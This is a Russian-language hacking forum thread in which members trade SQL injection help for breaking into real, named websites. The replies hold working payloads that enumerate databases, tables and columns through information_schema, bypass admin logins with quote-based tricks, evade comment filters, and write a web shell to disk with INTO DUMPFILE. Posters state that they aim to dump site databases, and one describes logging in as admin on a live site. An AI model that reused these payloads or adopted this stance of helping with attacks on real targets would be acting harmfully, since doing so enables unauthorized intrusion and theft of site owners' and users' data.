RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-10-31 16:29:16.500000
|
|
|
ibz07
Сообщений: 74
Оценки: 0
Присоединился: 2009-09-28 21:31:31.813333
|
quote:
ORIGINAL: Lorden
программа encoder1.0 юзай её и небудит утебя никаких проблем с переводом
У меня линукс, мене нужен онлайн сервис, если буду хакать на другой машине, то сборник программ я не буду таскать засобой.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-10-31 21:47:23.170000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
ORIGINAL: ibz07
Почиму не работает так?
http://localhost/index.php?id=-1+UNION+SELECT+1,table_name+FROM+information_schema.tables+WHERE+table_schema="0x"+hex("site")
Каким способом можно отказаться от 16 системы, просто я не хочу мучатся переводить в 16 систему?
Я же тебе сказал, что в твоем случае сравнение ведется со строкой "0x73697465".
table_schema="0x73697465"
Понимаешь? Это строка. Первый ее символ "0", второй "x",…
А когда ты пишешь
table_schema=0x73697465
0x73697465 переводится из 16-ричной системы в строку и происходит сравнение
table_schema="site"
Если не экранируются кавычки, то и переводить в 16-ричную систему нет смысла, так и пиши:
table_schema="site"
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-10-31 22:09:35.876666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: ibz07
quote:
ORIGINAL: Lorden
программа encoder1.0 юзай её и небудит утебя никаких проблем с переводом
У меня линукс, мене нужен онлайн сервис, если буду хакать на другой машине, то сборник программ я не буду таскать засобой.
http://bug-track.ru/coder/
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-01 13:41:14.206666
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
подскажити что такое: при таком запросе http://www.trizland.ru/author.php?id=-140+union+select+1,2,3,4,5 показывает что уязвимость есть а при таком запросе: http://www.trizland.ru/author.php?id=-140+union+select+1,2,3,users(),5 выдаёт ошибку, подскажити как обойти её?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-01 14:47:43.040000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
http://www.trizland.ru/author.php?id=-140+union+select+1,2,3,unhex(hex(user())),5
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-05 11:41:54.173333
|
|
|
Eridan
Сообщений: 5
Оценки: 0
Присоединился: 2009-08-05 23:02:24.290000
|
http://bids.md/index.php?lot=26 тут по ходу есть инъекция,но ошибку выдают с какими-то закорючками,можно ли это перекодировать в нормальный вид и раскрутить дальше?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-05 12:22:39.543333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Не закорючки там, кодировку в браузере настрой:
quote:
Была попытка SQL-инъекции в GET-запросе lot = 26'
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-06 16:21:06.496666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
привет всем!
помоги те пожайлуста
SELECT * FROM dat_news WHERE newsid=' !тут дыра! '
скобки не фильтруються!
не могу закомментировать последний апостроф пробывал /*, –
что делать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-06 21:34:34.973333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
1. Попробуй писать коментарии с пробелом на конце /*+, –+
2. Если не прокатит, то вообще незачем коментировать. Пиши так:
newsid=-1'+UNION+SELECT+(что и откуда тебе надо)+WHERE+'1'='1
Правда при этом возникнет косяк с лимитом и выбирать данные придется как в MSSQL.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-07 02:45:11.090000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
SELECT * FROM dat_news WHERE newsid='-1' UNION SELECT 1,2 where 1='1' -
что то колонки подобрать немогу можно какнибуть по другому?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-07 10:57:09.060000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
GoldCode ну для начала подредактируй свой пост, и одной строчки достаточно.
Далше, в каком виде тебе приходит ошибка? Если в виде MySQL сообщения, то что пишет?
И еще. Какой запрос вызвал у тебя такое where 1='1' -
P.S. В качестве коментария можешь попробовать еще %23 и %60.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-08 03:28:36.226666
|
|
|
MrСIM
Сообщений: 44
Оценки: 0
Присоединился: 2009-11-06 10:44:04.223333
|
Я знаю, что тема вдоль и поперек изъезжена(особенно глупыми вопросами типа а что дальше делать), но я решился на этот пост…
Мне 17 и програмлю я с 5 класса, неплохо разбираюсь во многих языках и все такое(пойму что тут делается даже не зная языка проблема только в синтаксисе…).
Я прекрасно понимаю весь процесс sql-инъекций, поэтому задаю только 2 вопроса:
1.Для начала я думаю стоит посерьезнее заняться языками программирования PHP и My_SQL(синтаксисом, командами…), есть ли какие либо предпочтения по литературе или достаточно будет первого попавшегося под руку?
2.Есть ли у кого статьи, в которых (как в октябрьском номере хакера) описаны хитрости с командами My_SQL(замена пробелов и т.п.)?
Посколько после первых моих экспериментов с сайтом на DLE меня порадовала натпись : "Хакинг эттепт!" .
Я думаю на этом все, в гугль не отправлять я и сам могу, я ищю совета а не результат поисковой машины…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-08 17:55:38.873333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
MrСIM зайди в этом разделе в Уроки группы 9009
Там есть два урока по скулям. В них я и книжку рекомендовал и некоторые тонкости уже успел описать.
GoldCode блин, что-то я сразу тупанул. Ведь запрос
…UNION SELECT 1,2 where 1='1'
просто обязан выдать ошибку.
Если не прокатили никакие комментарии составь запрос:
SELECT * FROM dat_news WHERE newsid='-1' UNION SELECT 1,2 FROM information_schema.columns where 1='1'
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-09 18:44:56.810000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
Что то я устал мурыжить этот забугорный сайт, хочешь сам попытайся
http://www.socialfriendsonline.com/dat_news.php?nid=5'+where+1='1
можешь ещё и этот помурыжить сайт
http://www.youand.me/news.php?cat=%'+and+category='-1+UNION+SELECT+1,2,3,4,5+where+category='
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-20 14:09:47.323333
|
|
|
lomak122
Сообщений: 205
Оценки: 0
Присоединился: 2009-11-17 17:27:57.543333
|
http://inferno.su/news.php?p_id=0
Что тут может бытЬ ??
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-23 23:56:32.676666
|
|
|
micropsia
Сообщений: 7
Оценки: 0
Присоединился: 2009-11-19 17:18:14.060000
|
А вот с этим что-нибудь можно сделать? давно интересует меня
http://www.putin.ru/advanced-search/%2527%2527%2527.html?ordering=newest&searchphrase=all#content
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-29 11:41:15.260000
|
|
|
lomak122
Сообщений: 205
Оценки: 0
Присоединился: 2009-11-17 17:27:57.543333
|
http://inferno.su/news.php?p_id=0 вообще непредставляю что тут делать ;(( попробуйте на досуге..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-01 18:38:52.793333
|
|
|
newmem
Сообщений: 8
Оценки: 0
Присоединился: 2009-12-01 11:56:34.243333
|
нашел сайт сделал так http://www.***.ru/index.php?id=-1
вылезла такая ошибка
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/includer.php on line 62
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/includer.php on line 69
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 14 in /home/www/htdocs/includer.php on line 92
вроде подобрал кол-во столбцов и страница стала пустая подскажите пожалуйста почему так.
http://www.***.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-01 19:24:45.333333
|
|
|
newmem
Сообщений: 8
Оценки: 0
Присоединился: 2009-12-01 11:56:34.243333
|
quote:
ORIGINAL: Lorden
программа encoder1.0 юзай её и небудит утебя никаких проблем с переводом
а где можно взять эту прогу скинь плиз куда нить ее чтоб можно было качнуть
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-01 21:31:13.490000
|
|
|
lomak122
Сообщений: 205
Оценки: 0
Присоединился: 2009-11-17 17:27:57.543333
|
http://inferno.su/news.php?p_id=0 ___ посмотрите на досуге.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 00:49:02.703333
|
|
|
s0llo
Сообщений: 7
Оценки: 0
Присоединился: 2009-12-13 00:00:19.873333
|
есть сайт на котором присутствует иньекция, на этом сайте много баз данных.версия sql 5(поддерживает information_schema)
вопрос: как мне спомощью information_schema вывести инфу из других баз? (например я нахожусь в базе "test" а нужны данные из базы "users")
??????????
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 01:19:44.656666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Узнаем все БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(schema_name),3,4,5,6,7,8,9,10+from+information_schema.schemata–
Узнаем таблицы из нужной БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema='ИМЯ_БД'–
Узнаем колонки из нужной таблицы из нужной БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name='ИМЯ_ТАБЛИЦЫ'+and+table_schema='ИМЯ_БД'–
Узнаем данные из нужной таблицы из нужной БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(ИМЯ_КОЛОНКИ),3,4,5,6,7,8,9,10+from+ИМЯ_БД.ИМЯ_ТАБЛИЦЫ–
PS: или убрать group_concat и юзать как обычно:
limit+0,1
limit+1,1
……
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 02:46:49.153333
|
|
|
s0llo
Сообщений: 7
Оценки: 0
Присоединился: 2009-12-13 00:00:19.873333
|
quote:
ORIGINAL: Pashkela
Узнаем все БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(schema_name),3,4,5,6,7,8,9,10+from+information_schema.schemata–
Узнаем таблицы из нужной БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema='ИМЯ_БД'–
Узнаем колонки из нужной таблицы из нужной БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name='ИМЯ_ТАБЛИЦЫ'+and+table_schema='ИМЯ_БД'–
Узнаем данные из нужной таблицы из нужной БД:
http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(ИМЯ_КОЛОНКИ),3,4,5,6,7,8,9,10+from+ИМЯ_БД.ИМЯ_ТАБЛИЦЫ–
PS: или убрать group_concat и юзать как обычно:
limit+0,1
limit+1,1
……
ага… спс!!! но теперь при выводе других баз, страничка не выводит данные(ошибки на стр. нет) баз данных примерно 20, не думаю что они пустые!!!!!
подскажите!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 03:16:45.886666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
может просто не хватать прав на чтение, могут быть пустые. Не всегда есть права читать данные не из текущей БД
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 18:57:52.033333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
s0llo, возможно ты просто неправильно запрос составил.
Если бы не было прав на базу, она бы не отражалась в information_schema.
А ошибки выводятся на экран?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-22 23:07:15.570000
|
|
|
Dikoy
Сообщений: 68
Оценки: 0
Присоединился: 2009-03-03 08:48:14.176666
|
помогите… вот нашёл иньекцию http://www.rf-cheats.ru/forum/search.php?do=process'
хотел бы хоть что то с ней сделать?( а вообще слить бд)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-24 00:52:06.603333
|
|
|
Agent Smith
Сообщений: 976
Оценки: 0
Присоединился: 2007-04-10 21:56:49.593333
|
[video]Stcy0rhDkEo[/video]
снял небольшое видео. Правда там больше времени у меня пошло, что бы найти форму ввода хоть какую-то. Но все SQL инъекция прошла. Пользуйтесь. По ходу ещё дыру не закрыли, поскольку это видео на ютубе видели 6 человек.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-26 01:27:10.560000
|
|
|
Fixxer
Сообщений: 40
Оценки: 0
Присоединился: 2009-12-05 00:54:21.626666
|
Всем привет. Можно ли как-нибудь в этой ситуации найти SQL-inj?
http://wowedge.info/armory/index.php?searchType=profile&charPage=account&character=Fixx&realm=The%20Edge#
Или через личный кабинет…
Логин Fixxer
Пароль 12213
Помогите пож)
Очень интересно тем, что админ там хороший) руки ростут где надо) так что это не просто)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-31 10:18:52.483333
|
|
|
DokKok
Сообщений: 1
Оценки: 0
Присоединился: 2009-12-31 08:55:41.573333
|
Здравствуйте.
Столкнулся со следующей проблемой:
Нашел дырявый сайт, начала пробовать SQL-inj.
/index.php?id=-1 union select 1,2,3/* - канает (показывает 1 и 3)
/index.php?id=-1 union select 1,2,3,4/* - уже ошибка
Определил версию Mysql (5), Определил имя таблицы - Clients. Начал перебирать поля. Оказалось в таблице 10 полей (ID,first_name,last_name, phone, email, LOGIN, PASSWORD, lastip, lastdate,firstdate). Если пытюсь вывести значения поля ID - выводит нормально, в остальных всех случаях ошибка-
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/home/adminmss/public_html/vvlaw/index.php on line 34
А делаю простейший запрос: например /index.php?id=-1 union select login,2,3 from clients/* (тут выскакивает ошибка, написанная выше)
Не пойму в чем дело - помогите пожалуйста.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-31 12:52:32.510000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
1. Таблица может быть в другой БД, проверить так:
/index.php?id=-1 union select table_schema,2,3 information_schema.columns where table_name='ИМЯ_ТАБЛИЦЫ'
2. Записей может быть 0, проверь так:
/index.php?id=-1 union select count(*),2,3 from clients/*
и посмотри ответ в принтабельном поле, если ноль - о чем речь
3. Несовпадение кодировок
/index.php?id=-1 union select unhex(hex(login)),2,3 from clients/*
и еще куча вариантов. Читай тему, тут всё есть (включая ссылки, что почитать).
СНГ
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-31 13:08:35.610000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Pashkela, видимо №3.
По поводу №1: он пишет, что поле ID может вывести, значит в таблицу попал.
По поводу №2: если бы таблица была пуста, то, вроде, ошибки бы не было, просто пустой результат.
С Новым Годом!:)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-31 16:26:29.090000
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
скажите есть ли возможность залить шелл на сайт через sql - инъекцию есть знаешь директорию доступную для записи (к примеру /path/), есть права на запись (file_priv:Y) ? какой нужно в этом случае составить запрос ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-02 15:36:51.173333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: daniel_1024
скажите есть ли возможность залить шелл на сайт через sql - инъекцию есть знаешь директорию доступную для записи (к примеру /path/), есть права на запись (file_priv:Y) ? какой нужно в этом случае составить запрос ?
union+select+1,2,3,тут_код_шелла_в_hex,4,5,6,7+into+dumpfile+'/абсолютный_путь_до_папки_с_правами_на_запись/имя_шелла.php'
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 16:34:14.863333
|
|
|
Fixxer
Сообщений: 40
Оценки: 0
Присоединился: 2009-12-05 00:54:21.626666
|
Всех с праздниками!!
Ребят я нуб…подскажите пож.
Что это ' or '1'='1 или ' or "=' or '1'='1
Как это называется? Можно ли изменить 1 на любое другое число? Что это запрос делает?
Я в яндексе искал..там не нашел.
Помогите пож.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 18:16:27.453333
|
|
|
PR23
Сообщений: 45
Оценки: 0
Присоединился: 2007-11-11 22:23:58.480000
|
Приветствую.
Такой вопрос: в поле логина админки ввожу одинарную кавычку.
Вылазит ошибка
quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and admin_password=old_password('') limit 1' at line 1
Стоит дальше капать? Что попробывать ввести?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 19:25:35.690000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
ORIGINAL: Fixxer
Что это ' or '1'='1 или ' or "=' or '1'='1
В основном, такие конструкции применяются для простукивания скрипта на наличие дыр. Разберись с принципом проведения инъекций и ты сам поймешь что к чему.
quote:
ORIGINAL: PR23
Стоит дальше капать? Что попробывать ввести?
Еще как стоит. Например так:
admin'/*
666' or 1=1/*
Если не прокатит, поизменяй комментарии.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 21:08:47.690000
|
|
|
PR23
Сообщений: 45
Оценки: 0
Присоединился: 2007-11-11 22:23:58.480000
|
quote:
Еще как стоит. Например так:
admin'/*
666' or 1=1/*
Спасибо за совет, НО
Попробывал:
admin'/*
666' or 1=1/*
Ничего(т.е. перенаправило на форму ввода логина и пасса)
Попробывал:
admin' –
666' or 1=1 –
quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '666' or 1=1 –') limit 1' at line 1
Что это значит?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 21:35:25.973333
|
|
|
Fixxer
Сообщений: 40
Оценки: 0
Присоединился: 2009-12-05 00:54:21.626666
|
Я нашёл сайт где в админке пишешь
Логин: 1
Пасс: ' or '1'='1
И заходит под админом. но так как проблема с прокси я ничего там не делал)
Нашёл сегодня сайт)
Хориз, если ты хорошо разбираешься…может поучишь меня??? В аське…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 22:04:00.266666
|
|
|
Fixxer
Сообщений: 40
Оценки: 0
Присоединился: 2009-12-05 00:54:21.626666
|
Естественно в личке номер… =)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 22:19:51.840000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
PR23, ты не понял, admin'/* и 666' or 1=1/* это два разных варианта, вводимых в поле логин. Пасс можешь ввести любой. Например blablabla.
|
|
|
|
|
|
